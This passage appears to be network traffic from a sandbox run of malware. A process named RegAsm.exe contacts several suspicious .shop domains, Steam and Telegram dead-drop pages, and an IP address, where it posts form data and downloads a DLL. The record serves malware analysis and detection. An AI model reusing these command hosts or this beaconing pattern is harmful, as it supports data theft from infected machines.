    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=jhi340vq4h2b9t567rb2cl7ie1; expires=Mon, 13 Jan 2025 17:20:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTWcUe9Kpdgiul%2BYDvigYsiIK4ZhIv5LBy4OWr12Yla%2FI%2FGbh5qWv8htMDwsfBYOCq2RbWM2D6rRVgytaFzOSRzKDmkm7Q9gu1Bgst2MaudiMTKhJycTg1lql6EjqsvTXTRMIbeCZg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d617f792663f2-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    81.173.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.173.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    puredoffustow.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    puredoffustow.shop
    IN A
    Response
    puredoffustow.shop
    IN A
    172.67.211.222
    puredoffustow.shop
    IN A
    104.21.85.226
  • flag-us
    POST
    https://puredoffustow.shop/api
    RegAsm.exe
    Remote address:
    172.67.211.222:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: puredoffustow.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=qkisigakqhd2vtn1b48aogm2ur; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9%2F%2F1upMc%2FdThgCh3LCwNV8bl%2B5Drxqnx6MBMV%2FW57XaDsdSo3bCqZg5zJqmUCK1p27YzmkKYZLKgJGDT9RREe6Pa3BUlyJvypL%2FKGq5o5qiUlr1GX%2Bw762ROqyI8LUYZ6lM9kE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6181ddd63866-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    opponnentduei.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    opponnentduei.shop
    IN A
    Response
    opponnentduei.shop
    IN A
    172.67.209.183
    opponnentduei.shop
    IN A
    104.21.45.51
  • flag-us
    POST
    https://opponnentduei.shop/api
    RegAsm.exe
    Remote address:
    172.67.209.183:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: opponnentduei.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=o2v40gp697nuocpd7hbqgmv91r; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blD0tK%2B1NBoYbt%2BIfY%2BsCpuXhsrnT8tALUR5xgfWYmGt6W4%2ByBpgeH9uriAHxQy9G5ms24iWHvqprwbdsq8fmQIEoKxGJK%2BOAtswUkghRIFo6irCm6k5TEKuirX5b1bch7UE9ko%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6184186d718c-LHR
  • flag-us
    DNS
    77.39.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.39.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    222.211.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    222.211.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    metallygaricwo.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    metallygaricwo.shop
    IN A
    Response
    metallygaricwo.shop
    IN A
    104.21.75.242
    metallygaricwo.shop
    IN A
    172.67.184.9
  • flag-us
    POST
    https://metallygaricwo.shop/api
    RegAsm.exe
    Remote address:
    104.21.75.242:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: metallygaricwo.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:28 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=abkv351bojgqfvak024bo1l94t; expires=Mon, 13 Jan 2025 17:20:07 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yelfb%2BRrvcHHGCnZRHPgVfnHYYcX5I1gt59s%2BHdvfWrDCAaWFm9qf7yUQN4Tr2JSzRjZGiHac0Gb0GVRWA3SIIPECk9amtB%2ByBbsq7XF13uiGmuMqLOOWYQr4FUpy4Fwa60HmDxC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d61865b3188b6-LHR
  • flag-us
    DNS
    milldymarskwom.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    milldymarskwom.shop
    IN A
    Response
    milldymarskwom.shop
    IN A
    104.21.50.100
    milldymarskwom.shop
    IN A
    172.67.204.182
  • flag-us
    POST
    https://milldymarskwom.shop/api
    RegAsm.exe
    Remote address:
    104.21.50.100:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: milldymarskwom.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=c79tp04qgmsekmm31qn12fq255; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lQlMOooE84WMIl4qlC99ug2OhOjgspDwWsRSulwAuE%2F%2FCphvfFMoKqQG%2Bv8P23ia8nzhXtn0Aq5vXfYZTWXIff2HuA8zsS8ELbRyWNWB11H6ei3KrQZurCkTOJfYMS6PUjHjrIp"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d61889c8c63aa-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    quotamkdsdqo.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    quotamkdsdqo.shop
    IN A
    Response
    quotamkdsdqo.shop
    IN A
    104.21.37.45
    quotamkdsdqo.shop
    IN A
    172.67.203.241
  • flag-us
    POST
    https://quotamkdsdqo.shop/api
    RegAsm.exe
    Remote address:
    104.21.37.45:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: quotamkdsdqo.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=gvkk6n7aj1rar8e48uorfnef1v; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXqfg33u4ULmtQa9zI3SG1%2Fbvj78SWAV8FmT8yJ0kU6R3VPDXCpPgqENvNF4iw9WA3TC6u9lNihevNE6nkoLCnNkdUC6bP3d8vehW2XDwTphzLFuv6vkpYU95sCQbWBCEBVHMw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d618add0593fa-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 499
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    242.75.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    242.75.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.209.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.209.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    100.50.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    100.50.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    45.37.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    45.37.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    carrtychaintnyw.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    carrtychaintnyw.shop
    IN A
    Response
    carrtychaintnyw.shop
    IN A
    172.67.192.105
    carrtychaintnyw.shop
    IN A
    104.21.81.254
  • flag-us
    POST
    https://carrtychaintnyw.shop/api
    RegAsm.exe
    Remote address:
    172.67.192.105:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: carrtychaintnyw.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=f9fd3jc46h67nhnp6aipdl06ia; expires=Mon, 13 Jan 2025 17:20:08 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpi5%2FQbDdHMF6kXSvknvSA0MhQRdT%2FoNLS3p6oPgaER1kN3C4bp5le3ADTLExto%2FMern7trspn9KtE%2FxMm3uyHH5%2BncDuzcdBOEsLI%2F4eUluSey1eV6%2FITMlUzyVoMtnjJreiHXPIg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d618d0e8853a4-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    steamcommunity.com
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    steamcommunity.com
    IN A
    Response
    steamcommunity.com
    IN A
    104.82.131.75
  • flag-gb
    GET
    https://steamcommunity.com/profiles/76561199724331900
    RegAsm.exe
    Remote address:
    104.82.131.75:443
    Request
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Length: 34734
    Connection: keep-alive
    Set-Cookie: sessionid=a87144ae6d6cb5c7b4ca48f1; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=GB%7C0cca5b35055ce513436d8b708d875660; Path=/; Secure; HttpOnly; SameSite=None
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    genedjestytw.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    genedjestytw.shop
    IN A
    Response
  • flag-us
    DNS
    105.192.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.192.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    75.131.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    75.131.82.104.in-addr.arpa
    IN PTR
    Response
    75.131.82.104.in-addr.arpa
    IN PTR
    a104-82-131-75deploystaticakamaitechnologiescom
  • flag-us
    DNS
    gacan.zapto.org
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    gacan.zapto.org
    IN A
    Response
  • flag-us
    DNS
    t.me
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/edm0d
    RegAsm.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /edm0d HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: stel_ssid=d92373b31a9965fef1_17716598562039938540
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 19 Sep 2024 23:33:31 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12287
    Connection: keep-alive
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-de
    GET
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 4789
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://116.202.0.195/sqlp.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:34 GMT
    Content-Type: application/octet-stream
    Content-Length: 2459136
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:34 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    25.140.123.92.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.140.123.92.in-addr.arpa
    IN PTR
    Response
    25.140.123.92.in-addr.arpa
    IN PTR
    a92-123-140-25deploystaticakamaitechnologiescom
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 431275
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 93FCC04E4E994DC8BFBB99542087E108 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 411186
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F328A215B1AD49AFB3A0F5B7BEB19B33 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 315631
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
